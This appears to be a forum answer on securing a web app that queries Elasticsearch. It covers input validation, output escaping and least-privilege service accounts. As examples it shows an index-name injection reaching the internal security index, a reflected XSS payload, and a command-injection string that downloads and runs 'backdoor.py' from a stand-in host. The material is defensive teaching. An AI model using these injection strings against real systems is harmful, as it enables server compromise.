Short answer: Yes, you should probably do both input validation and output sanitization.
Input Validation
You should always assume there will be malicious users. The payload won't always by "XPTO". Depending on what client you use and how you use the user input in order to build your queries, there are attack vectors that can be dangerous. In the simplistic case that you want to allow access only to cesar_*
indices, and that your web app takes the user input (i.e. "xpto") and uses this to feed to curl and make the request to get all documents of the cesar_xpto
index
curl -uelastic:password -X GET "localhost:9200/index_{}/_search"
, the command will become
curl -uelastic:password -X GET "localhost:9200/index_xpto/_search"
What happens if the user specifies xpto,.security
as the input ? The request then becomes
curl -uelastic:password -X GET "localhost:9200/cesar_xpto,.security/_search"
and the user gets access to the documents of the internal security index. As said this is a very simplistic example and in this case a more interesting attack vector would be command injection ( i.e. an attacker using " && wget http://a.b.com/backdoor.py && chmod +x backdoor.py && ./backdoor.py
as input ) but I just wanted to illustrate a possibility.
If you use i.e. the Java high level rest client to build your queries, you'll be much safer from injection attacks in the ES layer but your application might still be susceptible to other attack types. Also, you should think about DoS attacks where users might be able to run multiple consecutive expensive queries, causing CPU/memory starvation in your ES Cluster.
Output Sanitization
Elasticsearch will return JSON responses (i.e. with the HTTP Response header content-type: application/json; charset=UTF-8
). That means that even if ES returns (reflects) back portions of the query - which it does in cases of an error - there is no danger for reflected XSS as there is no way the browser will interpret this as html. However, if you take the response and present it to the user in the context of a web app, then things change. For instance:
curl -uelastic:password -X GET 'localhost:9200/something<img%20src=x%20onerror=alert(1))>'
will get the following response from Elasticsearch
{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"}],"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"},"status":404}
Now if you take this and put it as is in the response page of your web app without escaping it, the <img src=x onerror=alert(1))>
part will trigger and will be executed in the user's browser. Again, just an example.
Least Privilege Principle
Another thing worth noting is that you should not run all the queries as a superuser
( i.e. the elastic
user) . Figure out the least privileges your users will need and create a role that has these privileges, assign the role to a service account user and use that to make the requests to Elasticsearch via the client. This way, even if a user finds a way to trick your application logic, the impact that it can have on your elasticsearch cluster will be contained.
Hope this helps